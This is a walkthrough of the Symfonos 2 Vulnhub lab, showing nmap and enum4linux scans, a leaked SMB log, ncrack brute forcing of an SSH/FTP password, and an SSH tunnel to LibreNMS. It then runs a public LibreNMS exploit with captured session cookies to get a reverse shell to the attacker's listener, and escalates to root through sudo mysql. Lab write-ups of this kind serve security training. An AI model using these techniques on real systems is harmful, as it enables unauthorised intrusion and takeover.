Symfonos 2
Symfonos 2 Vulnhub Walkthrough
Enumeration
Nmap
nmap -sC -sV -oA nmap/sym2 192.168.43.97Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 10:27 EDT
Nmap scan report for symfonos2 (192.168.43.97)
Host is up (0.00014s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:03:48:23 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2020-05-15T09:27:31-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-15T14:27:31
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 secondsEnum4linux
enum4linux -a 192.168.43.97Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 11:08:47 2020
==========================
| Target Information |
==========================
Target ........... 192.168.43.97
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.43.97 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 192.168.43.97 |
=============================================
Looking up status of 192.168.43.97
SYMFONOS2 <00> - B <ACTIVE> Workstation Service
SYMFONOS2 <03> - B <ACTIVE> Messenger Service
SYMFONOS2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
======================================
| Session Check on 192.168.43.97 |
======================================
[+] Server 192.168.43.97 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.43.97 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.168.43.97 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.97 from smbclient:
[+] Got OS info for 192.168.43.97 from srvinfo:
SYMFONOS2 Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 192.168.43.97 |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
==========================================
| Share Enumeration on 192.168.43.97 |
==========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SYMFONOS2
[+] Attempting to map shares on 192.168.43.97
//192.168.43.97/print$ Mapping: DENIED, Listing: N/A
//192.168.43.97/anonymous Mapping: OK, Listing: OK
//192.168.43.97/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
=====================================================
| Password Policy Information for 192.168.43.97 |
=====================================================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.43.97 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Trying protocol 445/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
===============================
| Groups on 192.168.43.97 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 192.168.43.97 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-629329663-2933547119-2337616968
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\aeolus (Local User)
S-1-22-1-1001 Unix User\cronus (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-629329663-2933547119-2337616968 and logon username '', password ''
S-1-5-21-629329663-2933547119-2337616968-500 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-501 SYMFONOS2\nobody (Local User)
S-1-5-21-629329663-2933547119-2337616968-502 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-503 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-504 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-505 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-506 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-507 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-508 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-509 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-510 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-511 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-512 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-513 SYMFONOS2\None (Domain Group)
S-1-5-21-629329663-2933547119-2337616968-514 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-515 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-516 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-517 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-518 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-519 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-520 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-521 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-522 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-523 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-524 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-525 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-526 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-527 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-528 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-529 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-530 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-531 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-532 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-533 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-534 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-535 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-536 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-537 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-538 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-539 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-540 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-541 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-542 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-543 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-544 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-545 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-546 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-547 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-548 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-549 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-550 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1000 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1001 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1002 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1003 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1004 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1005 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1006 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1007 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1008 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1009 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1010 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1011 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1012 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1013 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1014 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1015 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1016 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1017 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1018 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1019 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1020 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1021 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1022 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1023 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1024 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1025 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1026 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1027 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1028 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1029 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1030 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1031 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1032 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1033 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1034 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1035 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1036 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1037 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1038 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1039 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1040 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1041 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1042 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1043 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1044 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1045 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1046 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1047 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1048 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1049 *unknown*\*unknown* (8)
S-1-5-21-629329663-2933547119-2337616968-1050 *unknown*\*unknown* (8)
==============================================
| Getting printer info for 192.168.43.97 |
==============================================
No printers returned.
enum4linux complete on Fri May 15 11:09:08 2020
We can see that anonymous shared folder here
We then can use smbclient to see what's inside.
smblient
smbclient //192.168.43.97/anonymousWe can then ls to list all the available files inside the anonymous folder, then we saw a backup folder, change directory to that folder and get the log.txt by typing get log.txt
This is the content of log.txt
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
#======================= Global Settings =======================
[global]
## Browsing/Identification ###
# Change this to the workgroup/NT-domain name your Samba server will part of
workgroup = WORKGROUP
# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
# wins support = no
# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
; wins server = w.x.y.z
# This will prevent nmbd to search for NetBIOS names through DNS.
dns proxy = no
#### Networking ####
# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
; interfaces = 127.0.0.0/8 eth0
# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself. However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
; bind interfaces only = yes
#### Debugging/Accounting ####
# This tells Samba to use a separate log file for each machine
# that connects
log file = /var/log/samba/log.%m
# Cap the size of the individual log files (in KiB).
max log size = 1000
# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
# syslog only = no
# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
syslog = 0
# Do something sensible when Samba crashes: mail the admin a backtrace
panic action = /usr/share/samba/panic-action %d
####### Authentication #######
# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller".
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
server role = standalone server
# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.
passdb backend = tdbsam
obey pam restrictions = yes
# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
unix password sync = yes
# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
pam password change = yes
# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
map to guest = bad user
########## Domains ###########
#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set
#
# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
; logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
# logon path = \\%N\%U\profile
# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
; logon drive = H:
# logon home = \\%N\%U
# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
; logon script = logon.cmd
# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe. The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
# This allows machine accounts to be created on the domain controller via the
# SAMR RPC pipe.
# The following assumes a "machines" group exists on the system
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.
; add group script = /usr/sbin/addgroup --force-badname %g
############ Misc ############
# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
; include = /home/samba/etc/smb.conf.%m
# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
; idmap uid = 10000-20000
; idmap gid = 10000-20000
; template shell = /bin/bash
# Setup usershare options to enable non-root users to share folders
# with the net usershare command.
# Maximum number of usershare. 0 (default) means that usershare is disabled.
; usershare max shares = 100
# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
usershare allow guests = yes
#======================= Share Definitions =======================
[homes]
comment = Home Directories
browseable = no
# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
read only = yes
# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
create mask = 0700
# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
directory mask = 0700
# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
valid users = %S
# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
; comment = Network Logon Service
; path = /home/samba/netlogon
; guest ok = yes
; read only = yes
# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
; comment = Users profiles
; path = /home/samba/profiles
; guest ok = no
; browseable = no
; create mask = 0600
; directory mask = 0700
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Don't use IPv6 support by default.
UseIPv6 off
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask 022
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances 30
# Set the user and group under which the server will run.
User aeolus
Group aeolus
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
As we can see here we have a user called aeolus, so maybe we can brute force the ssh login using hydra
Exploitation
ncrack
ncrack -v -u aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.43.97We can see the password for the user aeolus is sergioteamo
ftp
After that we can use ftp to login
ftp 192.168.43.97Then I realized that we can ssh to the user to login into the user account.
ssh
ssh aeolus@192.168.43.97I been looking for a lot of directories and I can't seem to find a way. After looking at walk-through, I found out that there is a apache directory
navigate to the /etc/apache, we can find a few folders and I go into the sites-enabled folder and found a file called librenms.conf
cat that file and we find out this.
we can see that there is a server running at localhost port 8080.
We now need to port forward so that we can access the shell by using ssh tunneling.
ssh tunneling
ssh -L 9000:localhost:8080 aeolus@192.168.43.97Then we can use our browser to browse the web-page.
Exploit
it is LibreNMS. I went to searchsploit and did a quick lookup and got the exploit
After that, copy the exploit to a directory and set up the exploit
The exploit actually requires the URL, cookies and remote host and port.
I use BurpSuite to intercept the traffic and get the cookies from it
Before run the command, remember to set up a listener on our machine
Command should looks like this
python 47044.py http://localhost:9000 "XSRF-TOKEN=eyJpdiI6InJXNnlUNWVmaDZxbVJDQ3JjY2tVZEE9PSIsInZhbHVlIjoidFh0VGhjditaNm9YNWxnaGgxVHIranBiZzBTTTlEYUgzckRiXC9KK0pBT2htXC9cL0FKVEVIYkNwUkZuTmNvK3R3cGdpbEFXeisyTUhqQVBtXC9nU0t5VHh3PT0iLCJtYWMiOiJjNTU1NjcxYzc3Y2Q3ZjBhYjU5NzBhZDA2ZGY0MmI5OWQ2Yzc5N2MyOTcxMWY4YjUzZWJlYzFiZDI3NTJhOWUxIn0%3D; librenms_session=eyJpdiI6IkY3bVU4d2lnSCtTdmlrRjJ1bjRSeUE9PSIsInZhbHVlIjoiSEsxOHhDXC91QytSSmcyMHBJdEkrcUlmSVlrR29VaGp2ckxqQ0I5d1poWlwvQk0rRTBNRnJjQVdWYU5SdENrb1J0Z2VTNnlFS0FQdHdYeUhoQzNvVTE0dz09IiwibWFjIjoiNDRjYTQ4ZDk5NTM2Y2FkNDI4NzAwNDhhMjg2MjRlMTk3MTMzNzIzM2Q2NDI4NjYyNjQ2NjcwZWJmZDcyN2E2YyJ9; PHPSESSID=2jmu3np8ppkk80uu94b620rnc5" 192.168.43.182 5555We successfully connected to the user cronus
Privilege Escalation
We first get a proper shell by typing
python -c 'import pty; pty.spawn("/bin/bash")'When we type sudo -l, it will show this to us.
Thanks to this website that my senior sent to me, I manage to find a suitable command to get root from it
sudo mysql -e '\! /bin/sh'Got root access !
Congratulation!
Last updated
